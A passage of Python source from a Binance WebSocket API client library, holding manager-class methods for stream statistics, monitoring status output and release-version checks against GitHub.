:return: dict
"""
logger.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use"
"`get_used_weight()` instead!")
return self.binance_api_status
def get_debug_log(self):
"""
Get the debug log string.
:return: str
"""
if self.debug:
debug_msg = f" - called by {str(traceback.format_stack()[-2]).strip()}"
else:
debug_msg = ""
return debug_msg
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
:return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
except TypeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
Get all the stored error messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id: Optional[Union[str, bool]] = False) -> bool:
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
try:
return self.event_loops[stream_id]
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_event_loop_by_stream_id() - KeyError - {str(error_msg)}")
return False
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
:return:
"""
if bytes > 1024 * 1024 * 1024 *1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
:return:
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
Get infos about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
Get infos about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
# Do a fresh request if status is None or last timestamp is older 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
Get the amount of all stream subscriptions
:return: inf
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
try:
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
except KeyError:
logger.debug(f"BinanceWebSocketApiManager.get_listen_key_from_restclient() - KeyError")
return False
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
Get the number of how much received_last_second entries are stored till they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Systems-and-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
:param check_command_version: is the version of the calling `check_command <https://github.com/LUCIT-Systems-and-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
result = {}
result['active_streams'] = 0
result['crashed_streams'] = 0
result['restarting_streams'] = 0
result['highest_restart_per_stream_last_hour'] = 0
result['return_code'] = 0
result['status_text'] = "OK"
result['status_msg'] = ""
result['stopped_streams'] = 0
result['timestamp'] = time.time()
result['update_msg'] = ""
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_available()
except ModuleNotFoundError:
logger.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logger.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_available() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_available():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
result['average_receives_per_second'] = ((self.total_receives - self.monitoring_total_receives) /
time_period).__round__(2)
result['average_speed_per_second'] = (((self.total_received_bytes - self.monitoring_total_received_bytes) /
time_period) / 1024).__round__(2)
result['total_received_mb'] = (self.get_total_received_bytes() / (1024 * 1024)).__round__(2)
result['total_received_length'] = self.total_receives
result['stream_buffer_items'] = str(self.get_stream_buffer_length())
result['stream_buffer_mb'] = (self.get_stream_buffer_byte_size() / (1024 * 1024)).__round__(4)
result['reconnects'] = self.get_reconnects()
self.monitoring_total_receives = self.get_total_receives()
self.monitoring_total_received_bytes = self.get_total_received_bytes()
self.last_monitoring_check = result['timestamp']
result['uptime'] = ((result['timestamp'] - self.start_time) / (60*60*24)).__round__(3)
return result
@staticmethod
def get_new_uuid_id() -> str:
"""
Get a new unique uuid in string format. This is used as 'stream_id' or 'socket_id'.
:return: uuid (str)
"""
stream_id = uuid.uuid4()
new_id_hash = hashlib.sha256(str(stream_id).encode()).hexdigest()
new_id = f"{new_id_hash[0:12]}-{new_id_hash[12:16]}-{new_id_hash[16:20]}-{new_id_hash[20:24]}-" \
f"{new_id_hash[24:32]}"
return new_id
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
:return: int
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logger.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
:param timeout: seconds to wait to receive the result. If not there it returns 'False'
:type timeout: int
:return: `result` or False
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
Get all the stored result messages from the ringbuffer sent by the endpoints.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
How many entries should be stored in the ringbuffer?
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self, stream_buffer_name=False):
"""
Get the current number of items in all stream_buffer or of a specific stream_buffer
:param stream_buffer_name: Name of the stream_buffer
:type stream_buffer_name: str or stream_id
:return: int
"""
number = 0
if stream_buffer_name:
try:
return len(self.stream_buffers[stream_buffer_name])
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_stream_buffer_length() - KeyError - "
f"error_msg: {error_msg}")
return 0
else:
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
Get all infos about a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: set
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: str
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logger.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logger.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_buffer_maxlen(self, stream_buffer_name=False):
"""
Get the maxlen value of the
`stream_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If maxlen is not specified or is None, `stream_buffer` may grow to an arbitrary length. Otherwise, the
`stream_buffer` is bounded to the specified maximum length. Once a bounded length `stream_buffer` is full, when
new items are added, a corresponding number of items are discarded from the opposite end.
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: int or False
"""
if stream_buffer_name is False:
try:
return self.stream_buffer.maxlen
except IndexError:
return False
else:
try:
return self.stream_buffers[stream_buffer_name].maxlen
except IndexError:
return False
except KeyError:
return False
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of specific stream from the last seconds
:param stream_id: id of a stream
:type stream_id: str
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: str
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: str
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
"""
Add the number of processed receives
:param stream_id: id of a stream
:type stream_id: str
"""
current_timestamp = int(time.time())
try:
self.stream_list[stream_id]['processed_receives_total'] += 1
except KeyError:
return False
try:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] += 1
except KeyError:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][current_timestamp] = 1
with self.total_receives_lock:
self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
"""
Increase reconnect counter
:param stream_id: id of a stream
:type stream_id: str
"""
self.stream_list[stream_id]['logged_reconnects'].append(time.time())
self.stream_list[stream_id]['reconnects'] += 1
with self.reconnects_lock:
self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
"""
Increase the counter of transmitted payloads
:param stream_id: id of a stream
:type stream_id: str
"""
self.stream_list[stream_id]['processed_transmitted_total'] += 1
with self.total_transmitted_lock:
self.total_transmitted += 1
def is_manager_stopping(self):
"""
Returns `True` if the manager has a stop request, 'False' if not.
:return: bool
"""
if self.stop_manager_request is None:
return False
else:
return True
def is_exchange_type(self, exchange_type=False):
"""
Check the exchange type!
:param exchange_type: Valid types are `dex` and `cex`!
:type exchange_type: str
:return: bool
"""
if exchange_type is False:
return False
if self.exchange == "binance.org" or \
self.exchange == "binance.org-testnet":
is_type = "dex"
elif self.exchange == "binance.com" or \
self.exchange == "binance.com-testnet" or \
self.exchange == "binance.com-margin" or \
self.exchange == "binance.com-margin-testnet" or \
self.exchange == "binance.com-isolated_margin" or \
self.exchange == "binance.com-isolated_margin-testnet" or \
self.exchange == "binance.com-futures" or \
self.exchange == "binance.com-futures-testnet" or \
self.exchange == "binance.com-coin-futures" or \
self.exchange == "binance.com-coin_futures" or \
self.exchange == "binance.je" or \
self.exchange == "binance.us" or \
self.exchange == "trbinance.com" or \
self.exchange == "jex.com":
is_type = "cex"
else:
logger.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for"
f"exchange={str(self.exchange)}")
return False
if is_type == exchange_type:
return True
else:
return False
def is_stop_request(self, stream_id, exclude_kill_requests=False):
"""
Has a specific stream a stop_request?
:param stream_id: id of a stream
:type stream_id: str
:param exclude_kill_requests: if `True` this method returns `False` on kill_requests
:type exclude_kill_requests: bool
:return: bool
"""
logger.debug(f"BinanceWebSocketApiManager.is_stop_request({stream_id}){self.get_debug_log()}")
try:
if self.stream_list[stream_id]['stop_request'] is True:
return True
elif self.is_manager_stopping():
return True
elif self.stream_list[stream_id]['kill_request'] is True and exclude_kill_requests is False:
return True
else:
return False
except KeyError:
return False
def is_stop_as_crash_request(self, stream_id):
"""
Has a specific stream a stop_as_crash_request?
:param stream_id: id of a stream
:type stream_id: str
:return: bool
"""
logger.debug(f"BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) +
f"){self.get_debug_log()}")
try:
if self.stream_list[stream_id]['crash_request'] is True:
return True
except KeyError:
pass
if self.is_manager_stopping():
return True
else:
return False
def is_stream_signal_buffer_enabled(self):
"""
Is the stream_signal_buffer enabled?
:return: bool
"""
return self.enable_stream_signal_buffer
def is_update_available(self):
"""
Is a new release of this package available?
:return: bool
"""
installed_version = self.get_version()
if ".dev" in installed_version:
installed_version = installed_version[:-4]
if self.get_latest_version() == installed_version:
return False
elif self.get_latest_version() == "unknown":
return False
else:
return True
def is_update_availabe_unicorn_fy(self):
"""
Is a new release of `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ available?
:return: bool
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.is_update_available()
def is_update_availabe_check_command(self, check_command_version=False):
"""
Is a new release of `check_lucit_collector.py` available?
:return: bool
"""
installed_version = check_command_version
latest_version = self.get_latest_version_check_command()
if ".dev" in str(installed_version):
installed_version = installed_version[:-4]
if latest_version == installed_version:
